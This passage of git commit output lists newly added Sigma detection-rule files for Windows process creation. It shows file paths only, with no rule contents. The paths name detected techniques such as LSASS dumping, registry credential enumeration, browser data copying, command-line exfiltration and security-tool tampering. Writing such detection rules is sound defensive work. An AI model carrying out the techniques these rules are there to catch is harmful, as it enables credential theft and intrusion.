tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_nircmd_as_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_nmap_zenmap.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_nps.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_nsudo.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_pingcastle.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_process_hacker.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_rcedit_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_rclone_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_runxcmd.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_seatbelt.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_system_informer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_webbrowserpassview.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_python_adidnsdump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_python_inline_command_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_python_pty_spawn.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_query_session_exfil.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rar_compress_data.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rar_compression_with_password.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rar_susp_greedy_compression.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rasdial_execution.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_add_run_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_add_safeboot.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_bitlocker.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_defender_exclusion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_delete_safeboot.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_delete_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_desktop_background_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_disable_sec_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_machineguid.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_nolmhash.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_open_command.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_query_registry.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_screensaver.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_service_imagepath_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_software_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_volsnap_disable.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_windows_defender_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regedit_export_critical_keys.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regedit_export_keys.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regedit_import_keys.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regedit_import_keys_ads.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regedit_trustedinstaller.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regini_ads.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regini_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_logon_script.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_new_network_provider.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_typed_paths_persistence.yml 
create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_network_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_remote_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_susp_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_time_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_adfind.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_autoit.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_browsercore.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_cloudflared.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_createdump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_curl.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_gpg4win.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_netsupport_rat.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_office_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_paexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_pingcastle.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_pressanykey.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_vmnat.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rpcping_credential_capture.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ruby_inline_command_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_by_ordinal.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_inline_vbs.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_installscreensaver.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_keymgr.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_no_params.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_ntlmrelay.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_parent_explorer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_registered_com_objects.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_run_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_script_run.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_susp_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_sys.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_unc_path.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_user32_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_without_parameters.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_runonce_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_create_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_disable_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_new_kernel_driver.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_query.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_sdset_modification.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_service_path_modification.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_stop_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_appdata_local_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_delete.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_delete_all.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_disable.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_env_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_folder_combos.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_guid_task_name.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_reg_loader.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_schedule_type.yml create 
mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_schedule_type_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_susp_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_scrcons_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sdbinst_shim_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sdbinst_susp_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sdclt_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sdiagnhost_susp_child.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_secedit_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_servu_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_setspn_spn_enumeration.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_shutdown_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_shutdown_logoff.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sndvol_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_soundrecorder_audio_capture.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_splwow64_cli_anomaly.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_squirrel_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_squirrel_proxy_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ssh_port_forward.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ssh_rdp_tunneling.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ssm_agent_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_stordiag_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_16bit_application.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_alternate_data_streams.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_appx_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_automated_collection.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_child_process_as_system_.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_copy_browser_data.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_copy_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_copy_system_dir.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_crypto_mining_monero.yml create 
mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_disable_raccine.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_double_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_double_extension_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_download_office_domain.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_electron_app_children.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_embed_exe_lnk.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_etw_trace_evasion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_eventlog_clear.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_eventlog_content_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_execution_path.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_execution_path_webserver.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_gather_network_info_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_image_missing.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_inline_win_api_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_network_command.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_network_scan_loop.yml create mode 
100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_network_sniffing.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_non_exe_image.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_ntds.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_office_token_search.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_parents.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_private_keys_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_proc_wrong_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_progname.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_right_to_left_override.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_script_exec_from_temp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_service_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_service_dir.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_service_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_shadow_copies_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_sysnative.yml create mode 100644 
